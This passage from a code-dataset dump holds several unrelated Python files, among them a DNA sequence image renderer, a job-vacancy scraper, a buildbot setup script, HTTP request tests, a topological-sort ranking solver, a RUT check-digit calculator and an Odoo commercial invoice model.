np.frombuffer(mp_arr2.get_obj(), dtype=np.uint8)\n tmp_colours = arr2.reshape((args.threads,lastThreadSplits,dim,3))\n\n # Select the proper tmp_colours array for this thread. 
\n curColours = tmp_colours[id]\n \n # Index of our position in the genetic sequence.\n index = 0\n # Vertical\n for i in range(splits):\n max = dim\n if(len(gene) - (i+1)*dim <= 0 and id+1 == args.threads):\n max = len(gene) - (i)*dim\n # Horizontal\n for j in range(max):\n if(ord(gene[index]) < 86):\n # Cytosine\n if(ord(gene[index]) == 67):\n curColours[i, j] = cytosineColour\n # Guanine\n elif(ord(gene[index]) == 71):\n curColours[i, j] = guanineColour\n # Adenine\n elif(ord(gene[index]) == 65):\n curColours[i, j] = adenineColour\n # Thymine or Uracil\n elif(ord(gene[index]) == 84 or ord(gene[index]) == 85):\n curColours[i, j] = thymineColour\n #Lowercase\n elif(ord(gene[index]) > 85):\n # Cytosine\n if(ord(gene[index]) == 99):\n curColours[i, j] = cytosineColour\n # Guanine\n elif(ord(gene[index]) == 103):\n curColours[i, j] = guanineColour\n # Adenine\n elif(ord(gene[index]) == 97):\n curColours[i, j] = adenineColour\n # Thymine or Uracil\n elif(ord(gene[index]) == 116 or ord(gene[index]) == 117):\n curColours[i, j] = thymineColour\n\n # Keep track of where we are in the sequence and break once sequence is finished.\n index += 1\n # Clear RAM\n geneThread[id] = \"\"\n t_done.value+=1\n isLast(dim, colours, tmp_colours)\n\ndef isLast(dim, colours, tmp_colours):\n global t_done\n global splitsPerThread\n if(t_done.value >= args.threads):\n for i in range(args.threads):\n if(i == args.threads-1):\n colours[(args.threads - 1)*splitsPerThread:(args.threads-1)*splitsPerThread + lastThreadSplits, 0:dim] = tmp_colours[i]\n else:\n tmp = np.resize(tmp_colours[i], (splitsPerThread, dim, 3))\n colours[i*splitsPerThread:(i+1)*splitsPerThread, 0:dim] = tmp\n\n print(\"Done parsing sequence, saving image now...\")\n\n # Save the image and apply scaling.\n saveImg(colours, dim)\n else:\n sys.exit()\n\ndef geneSplit(gene, dim):\n splitGene = []\n for i in range(dim):\n splitGene.append(gene[(dim*i):(dim*(i+1))])\n\n splitsPerThread = int(dim/(args.threads))\n lastThreadSplits = splitsPerThread\n\n if(dim%args.threads != 0):\n splitsPerThread = int(dim/(args.threads))\n lastThreadSplits = dim - (args.threads-1)*splitsPerThread\n\n geneThread = [gene[i:i+(splitsPerThread*dim)] for i in range(0, len(gene), (splitsPerThread*dim))]\n if(args.threads>1):\n geneThread[args.threads-1] += geneThread[args.threads]\n geneThread[args.threads] = \"\"\n \n return geneThread, lastThreadSplits, splitsPerThread\n\n# Hold the genetic sequence as a string.\nsequence = \"\"\n\n# Default base colours.\nadenineColour = [239, 71, 111]\nthymineColour = [255, 209, 102]\ncytosineColour = [6, 201, 150]\nguanineColour = [17, 138, 178]\nuracilColour = [204, 102, 255]\n\n# See if custom colours are specified.\nif(args.A is not None):\n adenineColour = hex2RGB(args.A)\nif(args.T is not None):\n thymineColour = hex2RGB(args.T)\nif(args.C is not None):\n cytosineColour = hex2RGB(args.C)\nif(args.G is not None):\n guanineColour = hex2RGB(args.G)\n\n# See how user wants to input the sequence.\nif(args.file is not None):\n sequence = getGeneFromFile(args.file)\nelse:\n sequence = getGeneFromCLI()\n\nsequenceLength = len(sequence)\nprint(\"Length: \"+ str(sequenceLength) + \" bases\")\n\n# Find optimal size square for the array.\ndim = findSquareSize(sequence)\n\n# See if there is any point to using multiple threads.\nif(dim < args.threads):\n args.threads = dim\n\nprint(\"Array Dimmention: \" + str(dim) + \" bases\")\n\ngeneThread, lastThreadSplits, splitsPerThread = geneSplit(sequence, dim)\n\n# Values which need to be writable and 
viewable by all threads.\nt_done = mp.Value('i', 0)\n# Allocate memory for the arrays. We will then turn these into numpy arrays inside each thread.\nmp_arr = mp.Array(c.c_uint8, dim*dim*3)\nmp_arr2 = mp.Array(c.c_uint8, lastThreadSplits*dim*3*args.threads)\n\nlock = mp.Lock()\nj = splitsPerThread\n# Start the threads\nfor i in range(args.threads):\n # If last thread, pass in the proper number of splits for the last thread.\n if(i == args.threads-1):\n j = lastThreadSplits\n mp.Process(target=base2color, args=(lock, mp_arr, mp_arr2, t_done, geneThread[i], j, dim, i,)).start()","repo_name":"cole8888/Gene2Pic","sub_path":"gene2pic.py","file_name":"gene2pic.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32653808461","text":"# Collatz Conjecture - Start with a number n > 1.\n# Find the number of steps it takes to reach one using the following process:\n# If n is even, divide it by 2. If n is odd, multiply it by 3 and add 1.\n\n\n# def collatz(num):\n# counter = 0\n# # Determine if num is > 1\n# while num > 1:\n# # if num is even divide by 2\n# if num % 2 == 0:\n# num = num // 2\n# counter += 1\n# # if num is odd multiply by 3 and add 1\n# else:\n# num = (num * 3) + 1\n# counter += 1\n# return counter\n# print(collatz(25))\n\ndef re_collatz(num, counter=0):\n if num <= 1:\n return counter\n elif num % 2 == 0:\n return re_collatz(num//2, counter + 1)\n else:\n return re_collatz((num*3) + 1, counter + 1)\n\n\nprint(re_collatz(10))\n","repo_name":"puczkowskyjp/project_list","sub_path":"collatz.conjecture.py","file_name":"collatz.conjecture.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6387962628","text":"contacts={\"number\":4,\n \"students\":[\n {'name':'name1','email':'email1'},\n {'name':'name2','email':'email2'},\n {'name':'name3','email':'email3'},\n {'name':'name4','email':'email4'}\n ]\n\n}\n#capture only the email ids of all students\nfor i in contacts[\"students\"]:\n print(i) #this will print both name and email ids\n\nfor i in contacts[\"students\"]:\n print(i[\"email\"])","repo_name":"8rkprashanth/python","sub_path":"dictinory_insidedictinory.py","file_name":"dictinory_insidedictinory.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22253797801","text":"import json\nimport requests\nimport time\nimport pandas as pd\n\n\ndef getPage(page=0):\n \"\"\"\n Создаем метод для получения страницы со списком вакансий.\n Аргументы:\n page - Индекс страницы, начинается с 0. Значение по умолчанию 0, т.е. 
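# A worked trace of re_collatz from the Collatz record above: for n = 10 the
# orbit is 10 -> 5 -> 16 -> 8 -> 4 -> 2 -> 1, six halving/3n+1 steps, so
# re_collatz(10) returns 6 (the value the record prints).
steps, n = 0, 10
while n > 1:
    n = n // 2 if n % 2 == 0 else 3 * n + 1
    steps += 1
assert steps == 6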
первая страница\n \"\"\"\n\n params = {\n 'specialization': 1,\n 'date_from': '2022-12-10',\n 'date_to': '2022-12-10',\n 'page': page,\n 'per_page': 100\n }\n\n req = requests.get('https://api.hh.ru/vacancies', params)\n data = req.content.decode()\n req.close()\n return data\n\n\nfor page in range(0, 30):\n\n jsObj = json.loads(getPage(page))\n nextFileName = 'search.json'\n\n f = open(nextFileName, mode='w', encoding='utf8')\n f.write(json.dumps(jsObj, ensure_ascii=False))\n f.close()\n\n if (jsObj['pages'] - page) <= 1:\n break\n\n time.sleep(0.25)\n print(1)\nprint('Старницы поиска собраны')\ndt = []\ndf2 = pd.read_json('search.json')\nfor js in df2['items']:\n if js['salary'] != None:\n salary_from = js['salary']['from']\n salaty_to = js['salary']['to']\n salary_currency = js['salary']['currency']\n else:\n salary_from = None\n salaty_to = None\n salary_currency = None\n dt.append([\n js['name'],\n salary_from,\n salaty_to,\n salary_currency,\n js['published_at'],\n ])\n\ndf = pd.DataFrame(dt, columns=['name', 'salary_from', 'salary_to','salary_currency','published_at'])\ndf.to_csv('searchHH.csv', index=False)\n\n","repo_name":"Maksiz03/Zavyalov","sub_path":"3.3.3.py","file_name":"3.3.3.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3413885151","text":"#!/usr/bin/env python\n#\n# This software may be freely redistributed under the terms of the GNU\n# general public license.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n\"\"\"\nStandard setup script.\n\"\"\"\n\nimport sys\nimport os\nfrom distutils.core import setup\nfrom distutils.command.install_data import install_data\nfrom distutils.command.sdist import sdist\n\nfrom buildslave import version\n\nscripts = [\"bin/buildslave\"]\n# sdist is usually run on a non-Windows platform, but the buildslave.bat file\n# still needs to get packaged.\nif 'sdist' in sys.argv or sys.platform == 'win32':\n scripts.append(\"contrib/windows/buildslave.bat\")\n scripts.append(\"contrib/windows/buildbot_service.py\")\n\nclass our_install_data(install_data):\n\n def finalize_options(self):\n self.set_undefined_options('install',\n ('install_lib', 'install_dir'),\n )\n install_data.finalize_options(self)\n\n def run(self):\n install_data.run(self)\n # ensure there's a buildslave/VERSION file\n fn = os.path.join(self.install_dir, 'buildslave', 'VERSION')\n open(fn, 'w').write(version)\n self.outfiles.append(fn)\n\nclass our_sdist(sdist):\n\n def make_release_tree(self, base_dir, files):\n sdist.make_release_tree(self, base_dir, files)\n # ensure there's a buildslave/VERSION file\n fn = os.path.join(base_dir, 'buildslave', 'VERSION')\n open(fn, 'w').write(version)\n\nsetup_args = {\n 'name': \"buildbot-slave\",\n 'version': version,\n 'description': \"BuildBot Slave Daemon\",\n 'long_description': \"See the 'buildbot' package for details\",\n 'author': \"Brian Warner\",\n 'author_email': \"warner-buildbot@lothar.com\",\n 'maintainer': \"Dustin J. 
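# The hh.ru scraper above rewrites 'search.json' on every page, so only the
# last page survives to the DataFrame step. A hedged sketch of accumulating
# all pages in memory first; the 'items'/'pages' fields come from the same
# API responses the original code already reads.
import time, requests

def fetch_all_vacancies(date='2022-12-10', max_pages=30):
    items = []
    for page in range(max_pages):
        resp = requests.get('https://api.hh.ru/vacancies',
                            params={'specialization': 1, 'date_from': date,
                                    'date_to': date, 'page': page,
                                    'per_page': 100})
        data = resp.json()
        items.extend(data['items'])
        if page >= data['pages'] - 1:   # same stop rule as the original loop
            break
        time.sleep(0.25)
    return items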
Mitchell\",\n 'maintainer_email': \"dustin@v.igoro.us\",\n 'url': \"http://buildbot.net/\",\n 'license': \"GNU GPL\",\n 'classifiers': [\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: No Input/Output (Daemon)',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Software Development :: Testing',\n ],\n\n 'packages': [\n \"buildslave\",\n \"buildslave.commands\",\n \"buildslave.scripts\",\n \"buildslave.test\",\n \"buildslave.test.fake\",\n \"buildslave.test.util\",\n \"buildslave.test.unit\",\n ],\n 'scripts': scripts,\n # mention data_files, even if empty, so install_data is called and\n # VERSION gets copied\n 'data_files': [(\"buildslave\", [])],\n 'cmdclass': {\n 'install_data': our_install_data,\n 'sdist': our_sdist\n }\n }\n\n# set zip_safe to false to force Windows installs to always unpack eggs\n# into directories, which seems to work better --\n# see http://buildbot.net/trac/ticket/907\nif sys.platform == \"win32\":\n setup_args['zip_safe'] = False\n\ntry:\n # If setuptools is installed, then we'll add setuptools-specific arguments\n # to the setup args.\n import setuptools #@UnusedImport\nexcept ImportError:\n setup_args['scripts'] = [\n 'bin/buildslave'\n ]\nelse:\n setup_args['install_requires'] = [\n 'twisted >= 2.0.0',\n ]\n setup_args['entry_points'] = {\n 'console_scripts': [\n 'buildslave = buildslave.scripts.runner:run',\n ],\n }\n\nsetup(**setup_args)\n","repo_name":"paperclip/buildbot","sub_path":"slave/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"29760866796","text":"from decimal import Decimal\nfrom robot.api.deco import keyword\nfrom selenium import webdriver\nimport string\nimport pandas as pd\nimport requests\nimport unittest\n\nclass APIMethod():\n def __init__(self,url,methodtype,data=None,header=None,encodingtype=\"utf-8\"):\n self.url = url\n self.methodtype = methodtype\n self.data = data\n self.header = header\n self.encodingtype = encodingtype\n\n def ExecuteMethod(self):\n if self.methodtype == \"get\":\n req = requests.get(url=self.url,params=self.data,headers=self.header)\n elif self.methodtype == \"post\":\n req = requests.post(url=self.url,data=self.data,headers=self.header)\n print(\"Response status code is : \" + f'{req.status_code}')\n print(\"Response content is : \" + f'{req.content.decode(self.encodingtype)}')\n print(\"Response header is : \" + f'{req.headers}')\n print(\"Response cookie is : \" + f'{req.cookies}')\n print(\"Response apparent_encoding is : \" + f'{req.apparent_encoding}')\n return req\n\nclass APITest(unittest.TestCase):\n url = \"https://httpbin.org\"\n def test_001(self):\n #self.url = self.url + \"/get\"+\"?name=xx&age=yy\" 方法1\n self.url = self.url + \"/get\"\n params = {\"name\":\"张三\",\"age\":\"yy\"}\n req1 = requests.get(self.url,params=params)\n print(\"-get 请求-\")\n print(req1.headers)\n print(req1.cookies)\n print(req1.encoding) #编码方式 根据header判断\n print(req1.apparent_encoding) #编码方式 根据response content判断\n print(req1.status_code)\n print(req1.text) #默认以encoding方式解码\n print(req1.content.decode(\"unicode-escape\")) #指定解码方式\n #print(req1.content.decode(\"utf8\"))\n print(\"-session和cookie-\")\n s = requests.Session()\n s.headers={\n \"Cookies\": \"213135151\"\n }\n s.headers.update({\"TEST\":\"1\"})\n print(s.headers)\n req2 = s.get(self.url, params=params, 
headers={\"Test2\":\"2\"})\n print(req2.text)\n req3 = s.get(self.url, params=params)\n print(req3.text)\n #session可以为请求方法��供缺省数据,比如第一次请求中的{'Test': '1'}就是缺省数据,此时的缺省数据就是跨请求参数。\n #方法级别的参数不会被跨请求保持,比如第二次请求时,没有携带headers={'Test2': '2'},返回的结果中也没有,说明该参数没有在第一次请求后被保持住。\n print(\"--------------case1 finished---------------\")\n\n def test_002(self):\n # 请求URL\n url = \"https://httpbin.org/post\"\n # 请求数据\n data = {\n \"username\": \"slaine\",\n \"password\": 123456\n }\n # 发送请求,一般还需要提供header信息,此处为demo,暂不关注\n reponse1 = requests.post(url=url, data=data)\n res_json = reponse1.json()\n print(res_json)\n flag = reponse1.status_code == 200 or res_json[\"status\"] == 200 or res_json[\"msg\"] == \"login sucess\"\n # 假如http code为200,status为“200” msg为“login sucess”则测试通过\n if flag:\n print(\"pass\")\n else:\n print(\"fail\")\n print(\"--------------case2 finished---------------\")\n\n def test_003(self):\n testapi = APIMethod(\"https://httpbin.org/post\", \"post\", {'name':'Slaine','age':'18'}, header={\"test\":\"slaine\"})\n testapi.ExecuteMethod()\n\nif __name__ ==\"__main__\":\n suite = unittest.TestSuite()\n #suite.addTest(APITest(\"test_003\"))","repo_name":"gkj22222/PipelineTest","sub_path":"rf_test/test_project1/py_keyword/requesttest1.py","file_name":"requesttest1.py","file_ext":"py","file_size_in_byte":3585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20773740967","text":"import string\n\nclass Del:\n def __init__(self, keep=string.digits):\n self.comp = dict((ord(c), c) for c in keep)\n\n def __getitem__(self, k):\n return self.comp.get(k)\n\nDD = Del()\n\ndef cnmops_parser(path):\n\n variant_list = []\n\n with open(path, 'r') as file:\n for line in file:\n if not line.lstrip().startswith('#'):\n variant_list.append(line.strip().split('\\t'))\n file.close()\n\n complete_list = []\n\n count = 0\n for entry in variant_list:\n if 100 <= int(entry[4]) <= 900:\n if int(entry[3].translate(DD)) > 2 and int(entry[2])-int(entry[1]) >= 50:\n sublist = [entry[0], entry[1], entry[2], 'INS']\n sublist.append('_'.join(sublist))\n number_del += 1\n elif int(entry[3].translate(DD)) < 2:\n sublist = [entry[0], entry[1], entry[2], 'DEL']\n sublist.append('_'.join(sublist))\n number_del += 1\n complete_list.append(sublist)\n\n else:\n count += 1\n\n return(complete_list)","repo_name":"Joshtron/benchee","sub_path":"benchee/cnmops_func.py","file_name":"cnmops_func.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70704971942","text":"from collections import deque\n\nfor tc in range(int(input())):\n n = int(input())\n indegree = [0]*(n+1)\n graph = [[False] * (n+1) for _ in range(n+1)]\n data = list(map(int, input()))\n for i in range(n):\n for j in range(i+1, n):\n # 1. 자기보다 순위가 낮았던 팀 j 가리키기.\n graph[data[i]][data[j]] = True\n indegree[data[j]] += 1\n\n m = int(input())\n for i in range(m):\n a, b = map(int, input().split())\n # 간선 방향 뒤집기\n if graph[a][b]:\n graph[a][b] = False\n graph[b][a] = True\n indegree[b] -= 1\n indegree[a] += 1\n else:\n graph[a][b] = True\n graph[b][a] = False\n indegree[a] -= 1\n indegree[b] += 1\n\n # 위상정렬 알고리즘 시작\n # [특이 케이스]\n # 1. 사이클이 발생하는 경우, 2. 
위상 정렬의 결과가 1개가 아니라 여러개인 경우\n # 위 두가지 해당없다면 오직 하나의 경우만 정답 존재.\n\n result = []\n q = deque()\n\n for i in range(1, n+1):\n if indegree[i] == 0:\n q.append(i)\n\n certain = True # 위상정렬 결과가 하나인 여부\n cycle = False # 그래프 내 사이클이 존재하는 여부\n\n for i in range(n):\n # 큐가 빈 경우는 사이클이 발생했다는 의미\n if len(q) == 0:\n cycle = True\n break\n if len(q) >= 2:\n certain = False\n break\n\n now = q.popleft()\n result.append(now)\n for j in range(1, n+1):\n if graph[now][j]:\n indegree[j] -= 1\n if indegree[j] == 0:\n q.append(j)\n\n\n if cycle:# 사이클이 발생해서 데이터에 일관성이 없어 순위를 정할 수 없다.\n print(\"IMPOSSIBLE\")\n elif not certain: # 정답이 여러개여서 확실한 순위를 정할 수 없다.\n print(\"?\")\n else:\n for i in result:\n print(i, end = ' ')\n print()","repo_name":"dohyun93/python_playground","sub_path":"section18_(유형)_그래프이론문제/18-5.최종 순위.py","file_name":"18-5.최종 순위.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29569683226","text":"# Importing the cycle function from the itertools module.\nfrom itertools import cycle\n\n# Asking the user to input a number and then converting it to an integer.\nrut = int(input(\"Ingrese su rut sin digito verificador: \"))\n\ndef digito_verificador(rut):\n \"\"\"\n It takes the RUT, reverses it, multiplies each digit by a factor, and then sums the results\n \n :param rut: The RUT number you want to validate\n :return: The remainder of the division of the sum of the products of the reversed digits and the\n factors by 11.\n \"\"\"\n reversed_digits = map(int, reversed(str(rut)))\n factors = cycle(range(2, 8))\n s = sum(d * f for d, f in zip(reversed_digits, factors))\n return (-s) % 11\n\n\ndv = digito_verificador(rut)\n\n# The function digito_verificador returns the remainder of the division of the sum of the products of\n# the reversed digits and the factors by 11. 
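# A restatement of the Kahn's-algorithm invariants used by the ranking
# solution above: if the queue empties before all n nodes are emitted there
# is a cycle; if it ever holds two or more nodes the order is not unique.
# The adj/indeg shapes here are illustrative, not the original input format.
from collections import deque

def kahn(n, adj, indeg):
    q = deque(v for v in range(1, n + 1) if indeg[v] == 0)
    order, unique = [], True
    while q:
        if len(q) > 1:
            unique = False          # several valid topological orders exist
        u = q.popleft()
        order.append(u)
        for v in adj[u]:
            indeg[v] -= 1
            if indeg[v] == 0:
                q.append(v)
    return order, unique, len(order) == n   # last flag False => cycle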
If the remainder is 10, the digit verificator is \"k\", and\n# if it is 11, the digit verificator is 0.\nif dv == 10:\n dv = \"k\"\nelif dv == 11:\n dv = 0\n\n# Printing the RUT number and the digit verificator.\nprint(f\"Su rut es: {rut}-{dv}\")\n","repo_name":"rodofla/DLDataScienceG50","sub_path":"Introducción_a_la_programación_con_Python/Desafios/dv.py","file_name":"dv.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72792961061","text":"def createTable(meta, table, server, force):\n import pykdi\n\n # Open META table\n metaTable = pykdi.Table(meta)\n\n # Create the row key\n from util.zero import zeroEncode\n row = zeroEncode(table, '\\x02', '')\n \n # Make sure the table hasn't already been created (note this is a\n # race if there are other processes trying to create the table).\n for r,c,t,v in metaTable.scan('row = %r' % row):\n if force:\n metaTable.erase(r,c,t)\n else:\n raise RuntimeError('table %r already exists' % table)\n \n metaTable.set(row, 'config', 0, 'server = %s\\n' % server)\n metaTable.sync()\n \n\ndef main():\n import optparse\n op = optparse.OptionParser()\n op.add_option('-m','--meta',help='location of META table')\n op.add_option('-t','--table',help='name of table to create')\n op.add_option('-s','--server',help='server assignment for the table')\n op.add_option('-f','--force',help='server assignment for the table',\n action='store_true')\n opt,args = op.parse_args()\n\n if not opt.meta:\n op.error('need --meta')\n if not opt.table:\n op.error('need --table')\n if not opt.server:\n op.error('need --server')\n\n createTable(opt.meta, opt.table, opt.server, opt.force)\n\nif __name__ == '__main__':\n main()\n","repo_name":"bluefish/kdi","sub_path":"src/python/kdi/createTable.py","file_name":"createTable.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"35"} +{"seq_id":"36669187602","text":"from openerp import models, fields, api,_\nfrom openerp.exceptions import except_orm, Warning, RedirectWarning\n\nclass CommercialInvoiceModel(models.Model):\n _name = 'commercial_invoice.model'\n _rec_name = \"name\"\n name = fields.Char(string='Commercial Invoice Number',readonly=True)\n commercial_invoice_created_date = fields.Date(string='Created Date',default=fields.Date.today())\n customer_invoice_id = fields.Many2one('account.invoice',string='Customer Invoice No.')\n pi_id = fields.Many2one('sale.order',string='Proforma Invoice No.', required=True)\n customer_name = fields.Char(string='Customer Name')\n customer_name2 = fields.Char(string='Customer Name')\n customer_full_address = fields.Text(string='Customer Address')\n proforma_invoice_id = fields.Char(string='Proforma Invoice No.')\n proforma_invoice_created_date = fields.Date(string='Proforma Invoice Date')\n transport = fields.Many2one('delivery_transport.model',string='Means of Transport', required=True)\n supplier_factory_name = fields.Char(string='Delivery From Factory Name')\n supplier_factory_address = fields.Text(string='Delivery From Factory Address')\n beneficiary_vat_no = fields.Char(string='Beneficiary VAT No:', required=True)\n erc_no = fields.Char(string='ERC No')\n country_of_origin = fields.Char(string='Country Of Origin')\n country_of_origin2 = fields.Char(string='Country Of Origin')\n destination_address = fields.Text(string='Destination')\n client_shipping_factory_address = fields.Text(string='Factory 
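# A worked example of the mod-11 check digit above, with an illustrative RUT
# of 12345678: the reversed digits 8,7,6,5,4,3,2,1 meet the cycled factors
# 2,3,4,5,6,7,2,3, so the weighted sum is
#   8*2 + 7*3 + 6*4 + 5*5 + 4*6 + 3*7 + 2*2 + 1*3 = 138
# and (-138) % 11 == 5, giving the full RUT 12345678-5.
assert (-(8*2 + 7*3 + 6*4 + 5*5 + 4*6 + 3*7 + 2*2 + 1*3)) % 11 == 5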
Address') \n lc_id = fields.Char('L/C id')\n lc_num = fields.Char('L/C No.')\n lc_num2 = fields.Char(string='L/C No.')\n lc_date = fields.Date(string='L/C Dated')\n lc_date2 = fields.Date(string='L/C Dated')\n issuing_bank = fields.Text(string='Issuing Bank')\n vat_code = fields.Char(string='VAT No.' )\n irc_num = fields.Char(string='IRC No.' )\n bin_num = fields.Char(string='BIN No.' ) \n tin_num = fields.Char(string='TIN No.' )\n amend_no = fields.Char(string='Amend No' )\n amend_date = fields.Date(string='Amend Date' )\n ordered_products_name = fields.Text(string='ordered_products_name') \n ordered_products_number_of_bags = fields.Text(string='ordered_products_number_of_bags') \n ordered_products_quantity = fields.Text(string='ordered_products_quantity') \n ordered_products_price_of_unit = fields.Text(string='ordered_products_price_of_unit')\n ordered_products_amount = fields.Text(string='ordered_products_amount')\n ordered_products_total_quantity = fields.Char(string='ordered_products_total_quantity')\n ordered_products_total_amount = fields.Char(string='Total')\n ordered_products_total_amount_in_word = fields.Char(string='ordered_products_total_amount_in_word')\n currency_symbol_name = fields.Char(string='currency_symbol_name')\n currency_symbol_name1 = fields.Char(string='currency_symbol_name')\n currency_symbol_name2 = fields.Char(string='currency_symbol_name')\n currency_symbol = fields.Char(string='currency_symbol')\n currency_symbol1 = fields.Char(string='currency_symbol')\n currency_symbol2 = fields.Char(string='currency_symbol')\n contact_no = fields.Text(string='contact no',default='Export Sales Contract No. MCFN-MK010-018 dated 07-APR-18')\n only_seq_num = fields.Char(string='only_seq_num', size=255)\n num_of_bags = fields.Char(string='num_of_bags', size=255)\n delivery_order_num = fields.Char(string='Delivery Order Number') \n delivery_challan_num = fields.Char(string='Delivery Challan Number')\n delivery_order_created_date = fields.Date(string='Delivery Order Created date')\n\n @api.model\n def create(self, vals):\n \"\"\"\n Overrides orm create method.\n @param self: The object pointer\n @param vals: dictionary of fields value.\n \"\"\"\n if not vals:\n vals = {}\n seq_obj = self.env['ir.sequence']\n seq_obj2 = self.env['ir.sequence']\n invoice_num = seq_obj.next_by_code('commercial_invoice_report_num') or 'New'\n only_num = seq_obj2.next_by_code('only_num') or 'New_seqq'\n vals['name'] = invoice_num\n vals['only_seq_num'] = only_num\n return super(CommercialInvoiceModel, self).create(vals)\n\n def onchange_pi_id(self, cr, uid, ids, pi_id=False, context=None):\n res= {}\n if pi_id:\n service_obj= self.pool.get('sale.order').browse(cr, uid,pi_id,context=context) \n service_obj2= self.pool.get('res.partner').browse(cr, uid,service_obj.partner_id.id,context=context)\n service_obj3= self.pool.get('res.country').browse(cr, uid,service_obj2.country_id.id,context=context)\n currency_symbol= self.pool.get('res.currency').browse(cr, uid,service_obj.currency_id.id,context=context)\n cus_name = service_obj2.name\n cus_full_address = str(service_obj2.street) + \", \" + str(service_obj2.street2) + \", \" + str(service_obj2.city)+ \" - \" + str(service_obj2.zip) + \", \" + str(service_obj3.name)\n lc_id = service_obj.lc_num_id\n lc_service_obj= self.pool.get('lc_informations.model')\n rec = lc_service_obj.browse(cr, uid, lc_id.id)\n lc_bank_name = rec.bank_name2\n lc_bank_branch = rec.bank_branch\n lc_bank_address = rec.bank_address\n vat_no = rec.vat_no\n irc_no = rec.irc_no\n bin_no = 
rec.bin_no\n tin_no = rec.tin_no\n amend_no = rec.amend_no\n amend_date = rec.amend_date\n bank_info = str(lc_bank_name) + \"\\n\" + str(lc_bank_branch) + \"\\n\" + str(lc_bank_address)\n account_invoice_ids = self.pool.get('account.invoice').search(cr, uid,[('pi_no','=',service_obj.name),('process','=','set_for_LC')],context=context)\n if not account_invoice_ids:\n # print('Account invoice list is empty.')\n raise except_orm(_('Validation!'),\n _(\"No document ready for set L/C document under PI No. %s !\")% (service_obj.name,))\n else:\n invoice_line_pool_ids = self.pool.get('account.invoice.line').search(cr, uid,[('invoice_id','=',account_invoice_ids),],context=context) \n invoice_lines_product_name = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['name'], context=context)\n invoice_lines_product_quantity = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['quantity','name'], context=context)\n invoice_lines_product_price_of_unit = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['price_unit','name'], context=context)\n invoice_lines_product_amount = self.pool.get('account.invoice.line').read(cr, uid,invoice_line_pool_ids,['price_subtotal','name'], context=context)\n num_of_bags = service_obj.bags_of_packing\n ordered_products_names = self.split_products_names(invoice_lines_product_name) \n ordered_products_number_of_bags = self.split_products_number_of_bags(invoice_lines_product_quantity,num_of_bags)\n ordered_products_quantity = self.split_products_quantity(invoice_lines_product_quantity)\n ordered_products_price_of_unit = self.split_products_price_of_unit(invoice_lines_product_price_of_unit)\n ordered_products_amount = self.split_products_amount(invoice_lines_product_amount)\n ordered_products_total_quantity = self.products_total_quantity(invoice_lines_product_quantity)\n ordered_products_total_amount = self.products_total_amount(invoice_lines_product_amount)\n ordered_products_total_amount_in_word = self.numToWords(ordered_products_total_amount)\n\n do_no_read = self.pool.get('account.invoice').read(cr, uid,account_invoice_ids,['do_no'], context=context)\n do_no = self.split_do_no(do_no_read)\n stock_picking_ser_ids= self.pool.get('stock.picking').search(cr, uid,[('origin','=',service_obj.name),],context=context)\n order_date_read = self.pool.get('stock.picking').read(cr, uid,stock_picking_ser_ids,['date'], context=context)\n delivery_order_date = self.split_order_date_read(order_date_read)\n\n res = {'value':{\n 'customer_name':cus_name,\n 'customer_name2':service_obj2.name, \n 'customer_full_address':cus_full_address,\n 'proforma_invoice_id':service_obj.name,\n 'proforma_invoice_created_date':service_obj.create_date,\n 'supplier_factory_name':service_obj.place_of_delivery_name2, \n 'supplier_factory_address':service_obj.place_of_delivery_addr, \n 'client_shipping_factory_address':service_obj.cus_factory_addr,\n 'destination_address': service_obj.cus_factory_addr,\n 'erc_no':service_obj.erc_no,\n 'country_of_origin':service_obj.country_of_origin2,\n 'country_of_origin2':service_obj.country_of_origin2,\n 'num_of_bags': service_obj.bags_of_packing, \n 'lc_id':lc_id.id,\n 'lc_num':rec.name,\n 'lc_num2':rec.name,\n 'lc_date':rec.created_date,\n 'issuing_bank':bank_info,\n 'lc_date2':rec.created_date,\n 'vat_code':rec.vat_no,\n 'irc_num':rec.irc_no,\n 'bin_num':rec.bin_no, \n 'tin_num':rec.tin_no,\n 'amend_no':rec.amend_no,\n 'amend_date':rec.amend_date,\n 'ordered_products_name':ordered_products_names,\n 
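# Note (a sketch of the framework contract, not code from this module): an Odoo 8\n # old-API onchange returns {'value': {field: value}}; the client merges these\n # computed values into the still-unsaved form record.\n 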
